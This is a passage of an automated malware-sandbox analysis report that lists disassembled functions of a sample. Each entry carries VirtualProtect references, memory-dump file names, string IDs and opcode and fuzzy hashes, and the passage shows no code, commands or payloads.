                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 8b70c4aa26d7f2bcf99f32be88e0d80cc6d8ce75deedde87f3668fcd8c2d88b0
                                                                  • Instruction ID: 2ef544b212997e4fa31eec0942fd3b924e6969ce177f6a5f87ea744a3f2af44a
                                                                  • Opcode Fuzzy Hash: 8b70c4aa26d7f2bcf99f32be88e0d80cc6d8ce75deedde87f3668fcd8c2d88b0
                                                                  • Instruction Fuzzy Hash: DFD146A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                  Function 0040A984 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 380memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 2b7f984ab290ffcdb417485266c060ca2e2ab393ee018a43cc7025f2ff97e756
                                                                  • Instruction ID: 4790f4736528595fe89bac11a1248bc76c36d27961205c98a63ae5969e88619c
                                                                  • Opcode Fuzzy Hash: 2b7f984ab290ffcdb417485266c060ca2e2ab393ee018a43cc7025f2ff97e756
                                                                  • Instruction Fuzzy Hash: D4D145A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                  Function 0040A9AE Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 378memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: f01a4d86a7659898a418b6ab5ea87539e07283f0ac0f1837e998bda6eca18859
                                                                  • Instruction ID: 90faed7bee1ee36d03feeb63130216d79dd2597e9304a2bcdf97559ea1b09dd1
                                                                  • Opcode Fuzzy Hash: f01a4d86a7659898a418b6ab5ea87539e07283f0ac0f1837e998bda6eca18859
                                                                  • Instruction Fuzzy Hash: D8D146A2D082A49AF7218724DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                  Function 0040B524 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 378memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: abfe6fc19b72547787baa3c208adc5c17f130ab77c041f8ed1808c17cab47394
                                                                  • Instruction ID: 0371a4b27facc6ada17a49e1f9b6af079a9a001b71fe6c1c6e946b71b6c7c027
                                                                  • Opcode Fuzzy Hash: abfe6fc19b72547787baa3c208adc5c17f130ab77c041f8ed1808c17cab47394
                                                                  • Instruction Fuzzy Hash: 1FD144A1D082949BF7218624DC85BEB7B79EF81310F0481FED44D6A281D27E4FC6CB66
                                                                  Function 0040B489 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 364memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 34c39d1fb9014bbdb12798611917349d0329a1e4ff49ee0fab202022bbdc260a
                                                                  • Instruction ID: 81a1e5a6bc3b10ed7a4da47fcac608d4515ba001ea5eca5989b0f0c4c62595f1
                                                                  • Opcode Fuzzy Hash: 34c39d1fb9014bbdb12798611917349d0329a1e4ff49ee0fab202022bbdc260a
                                                                  • Instruction Fuzzy Hash: 73D144A1D082A89BF7218624DC857EB7B79EF91310F1481FED44D66281D27E0FC68B67
                                                                  Function 0040B494 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 364memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: f6f8ba0d642129f051d542368fb8ee1f7e53a1533c60da5431eedd70ea8ad1e4
                                                                  • Instruction ID: af87c79a6a843894e6144d3079a128d34d891af3e7149fc025cb9fe82e067a62
                                                                  • Opcode Fuzzy Hash: f6f8ba0d642129f051d542368fb8ee1f7e53a1533c60da5431eedd70ea8ad1e4
                                                                  • Instruction Fuzzy Hash: 46D145A1D082989BF7218624DC85BEB7B79EF91310F1481FAD44D66281D27E0FC6CB66
                                                                  Function 0040B5D4 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 363COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 2c56d24630f2530f2035040eecaa7ad1d832a73cf11b818619f49581e0e0aa52
                                                                  • Instruction ID: e2c6151aa9e1a55468fcc572f6645a23d0efd6f80fbeabc255d88c0749e44b9c
                                                                  • Opcode Fuzzy Hash: 2c56d24630f2530f2035040eecaa7ad1d832a73cf11b818619f49581e0e0aa52
                                                                  • Instruction Fuzzy Hash: 5ED164A2D082949BF7218624DC85BEB7B79EF91300F1481FED44D66281D27E0FC68B67
                                                                  Function 0040B609 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 346memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: d27d8dbd0c9865dc8d0986c517809e804b1766a9ec7c3e715070419703f59d93
                                                                  • Instruction ID: ec2c7275a11da5b48301671a939b02e52abdf974147d9040d07dd93b18dc885f
                                                                  • Opcode Fuzzy Hash: d27d8dbd0c9865dc8d0986c517809e804b1766a9ec7c3e715070419703f59d93
                                                                  • Instruction Fuzzy Hash: 1BC134A1D082949AF7218624DC85BEB7A79EF91310F1481FED44D66281D27E0FC68B67
                                                                  Function 0040A8CC Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 343memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 234e483e1178b1483c96e0a5d3dd4c39ef4cbc1da0435aac5b7e633688c8e3a1
                                                                  • Instruction ID: 65a9329dff9da8049b63510ff6d46cc8b505a5c024620a0484f6602da5aa6491
                                                                  • Opcode Fuzzy Hash: 234e483e1178b1483c96e0a5d3dd4c39ef4cbc1da0435aac5b7e633688c8e3a1
                                                                  • Instruction Fuzzy Hash: 20C154A2D082949BF7218624DC857EB7A79EF91310F1481FED44D6A281D27E0FC6CB67
                                                                  Function 0040B616 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 342memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: ff0b00d2677e5bf47b477799f7ef043f7de6343b797cf1b94cb9fb8b8eb8754b
